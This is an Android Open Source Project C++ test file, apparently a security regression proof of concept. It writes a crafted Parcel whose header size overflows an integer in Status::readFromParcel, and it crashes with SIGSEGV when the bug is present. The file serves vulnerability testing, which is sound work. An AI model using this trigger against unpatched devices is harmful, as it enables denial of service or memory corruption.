1 /** 2 * Copyright (C) 2020 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 #include <binder/Parcel.h> 17 #include <binder/Status.h> 18 19 using namespace android; 20 using ::android::binder::Status; 21 main(void)22int main(void) { 23 Parcel parcel; 24 parcel.writeInt32(Status::EX_HAS_REPLY_HEADER); 25 /** Vulerable Code: const int32_t header_start = parcel.dataPosition(); 26 parcel.setDataPosition(header_start + header_size); 27 Hence header_start is 4 [sizeof(int32_t)] as we have written 28 Status::EX_HAS_REPLY_HEADER. header_start + header_size computation will 29 overflow if header_size > INT32_MAX - sizeof(int32_t). 30 */ 31 parcel.writeInt32(INT32_MAX - sizeof(int32_t)); 32 parcel.setDataPosition(0); 33 Status status; 34 status.readFromParcel(parcel); 35 /** If vulnerability is present, the parcel's data position would be very 36 large. Hence any write to the parcel will trigger a SIGSEGV else the 37 write would pass. 38 */ 39 parcel.writeInt32(0); 40 return EXIT_SUCCESS; 41 } 42